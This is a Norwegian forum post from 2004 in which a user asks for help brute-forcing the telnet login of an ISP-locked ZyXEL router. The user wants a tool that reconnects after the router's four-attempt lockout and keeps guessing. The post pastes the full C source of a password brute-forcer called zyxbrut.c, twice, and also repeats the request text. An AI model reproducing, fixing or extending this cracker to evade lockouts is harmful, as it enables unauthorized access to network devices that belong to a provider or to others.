Hei,
Jeg trenger hjelp med å bruteforce en ZyXEL Prestige 650HW-33 router. Routeren har jeg fått gjennom mitt abbonement hos BKK, men desverre så har de aktivert brukernavn og passord så jeg ikke får muligheten til å forrandre IP, porter eller andre viktige NAT-innstillinger. De vil heller ikke oppgi brukernavn og passord, og for å forrandre ting i nettverket så må jeg sende mail til BKK og forhåpentligvis så gjør de det i løpet av et par dager. Ikke akkurat praktisk.
Jeg har prød et smart lite C program jeg fant på Packetstorm kalt zyxbrut.c, men dette viste seg å ikke være stort til hjelp. Programmet er et rimelig basic program som prøver en og en kombinasjon av brukernavn / passord, men desverre så har routeren en sikkerhetsfunksjon som gjør at den dreper tilkoblingen etter 4 gale passord, noe som resulterer i at programmet gir meg den kombinasjonen av brukernavn / passord det prøvde sist og påstår dette er riktig, noe det selvsagt ikke er. Det jeg må ha er et program som åpner opp en ny tilkobling etter at den første ble brutt, og fortsetter der det slapp til riktig kombinasjon er funnet. Programmet må fungere over en telnet-tilkobling, og fungere i et Linux-miljø.
Legger også ved kildekoden til zyxbrut i håp om at noen kan hjelpe meg med eventuelle feil. Forige gang jeg prøvde programmet, dvs. et halvt år siden eller så, så var det en del feil. Jeg fikk da hjelp av en bekjent over IRC, men det hjalp ikke på resultatet. Har desverre ikke den redigerte kildekoden lengre .
Takknemlig for all hjelp!
Faen, la jeg ikke med koden til zyxbrut.c? Jaja, får redigere den inn da.
Jeg trenger hjelp med å bruteforce en ZyXEL Prestige 650HW-33 router. Routeren har jeg fått gjennom mitt abbonement hos BKK, men desverre så har de aktivert brukernavn og passord så jeg ikke får muligheten til å forrandre IP, porter eller andre viktige NAT-innstillinger. De vil heller ikke oppgi brukernavn og passord, og for å forrandre ting i nettverket så må jeg sende mail til BKK og forhåpentligvis så gjør de det i løpet av et par dager. Ikke akkurat praktisk.
Jeg har prød et smart lite C program jeg fant på Packetstorm kalt zyxbrut.c, men dette viste seg å ikke være stort til hjelp. Programmet er et rimelig basic program som prøver en og en kombinasjon av brukernavn / passord, men desverre så har routeren en sikkerhetsfunksjon som gjør at den dreper tilkoblingen etter 4 gale passord, noe som resulterer i at programmet gir meg den kombinasjonen av brukernavn / passord det prøvde sist og påstår dette er riktig, noe det selvsagt ikke er. Det jeg må ha er et program som åpner opp en ny tilkobling etter at den første ble brutt, og fortsetter der det slapp til riktig kombinasjon er funnet. Programmet må fungere over en telnet-tilkobling, og fungere i et Linux-miljø.
Legger også ved kildekoden til zyxbrut i håp om at noen kan hjelpe meg med eventuelle feil. Forige gang jeg prøvde programmet, dvs. et halvt år siden eller så, så var det en del feil. Jeg fikk da hjelp av en bekjent over IRC, men det hjalp ikke på resultatet. Har desverre ikke den redigerte kildekoden lengre .
Takknemlig for all hjelp!
Faen, la jeg ikke med koden til zyxbrut.c? Jaja, får redigere den inn da.
/*
ZYXEL-brutuz v 1.0.0
Password-brutforcer for ZyXel Routerz...
C'ed by [ zWARYAG ] / BetaFly Computer Team
to compile : cc zyxbrut.c -o zyxbrut
Aug : 2k2
thnkzz to DruiD / BetaFly CT.
kengurenko@australkia.edu
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
void USAGE(void);
int main(int argc, char *argv[])
{
int port=23;
int s;
struct sockaddr_in addr;
int sock;
char pass_buf[30];
FILE *pass_filePtr;
char banner[2048];
char finder[5]="asswo";
if(argc!=3) USAGE();
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("Socket ERROR");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
if ((pass_filePtr=fopen(argv[2],"r"))==NULL) {
printf("[ERROR] '%s' could not be opened!\n",argv[2]);
exit(1);
}
fscanf(pass_filePtr,"%s", pass_buf);
while(!feof(pass_filePtr)) {
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("Socket ERROR");
exit(1);
}
if ((connect(sock,(struct sockaddr *) &addr, sizeof(addr))) == 0) {
bzero(banner,sizeof(banner));
s=send(sock,pass_buf,sizeof(pass_buf),0);
read(sock,banner,sizeof(banner));
s=send(sock,"\n",sizeof("\n"),0);
read(sock,banner,sizeof(banner));
if(strstr(banner,finder)) printf("%s\n",pass_buf);
else {
printf("\nOK! Password iz : %s\n",pass_buf);
close(sock);
exit(0);
}
}
fscanf(pass_filePtr,"%s", pass_buf);
close(sock);
}
return 0;
}
void USAGE()
{
printf("\n");
printf(" ZyXel-Brutuz v.1.0 by [zWARYAG] / BetaFly Computer Team\n");
printf(" Uze : zyxbrut <ip-addr> <passlizt>\n");
printf("\n");
exit(0);
}
ZYXEL-brutuz v 1.0.0
Password-brutforcer for ZyXel Routerz...
C'ed by [ zWARYAG ] / BetaFly Computer Team
to compile : cc zyxbrut.c -o zyxbrut
Aug : 2k2
thnkzz to DruiD / BetaFly CT.
kengurenko@australkia.edu
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
void USAGE(void);
int main(int argc, char *argv[])
{
int port=23;
int s;
struct sockaddr_in addr;
int sock;
char pass_buf[30];
FILE *pass_filePtr;
char banner[2048];
char finder[5]="asswo";
if(argc!=3) USAGE();
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("Socket ERROR");
exit(1);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
if ((pass_filePtr=fopen(argv[2],"r"))==NULL) {
printf("[ERROR] '%s' could not be opened!\n",argv[2]);
exit(1);
}
fscanf(pass_filePtr,"%s", pass_buf);
while(!feof(pass_filePtr)) {
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("Socket ERROR");
exit(1);
}
if ((connect(sock,(struct sockaddr *) &addr, sizeof(addr))) == 0) {
bzero(banner,sizeof(banner));
s=send(sock,pass_buf,sizeof(pass_buf),0);
read(sock,banner,sizeof(banner));
s=send(sock,"\n",sizeof("\n"),0);
read(sock,banner,sizeof(banner));
if(strstr(banner,finder)) printf("%s\n",pass_buf);
else {
printf("\nOK! Password iz : %s\n",pass_buf);
close(sock);
exit(0);
}
}
fscanf(pass_filePtr,"%s", pass_buf);
close(sock);
}
return 0;
}
void USAGE()
{
printf("\n");
printf(" ZyXel-Brutuz v.1.0 by [zWARYAG] / BetaFly Computer Team\n");
printf(" Uze : zyxbrut <ip-addr> <passlizt>\n");
printf("\n");
exit(0);
}
Vis hele sitatet...
Sist endret av Tias; 16. desember 2004 kl. 21:08.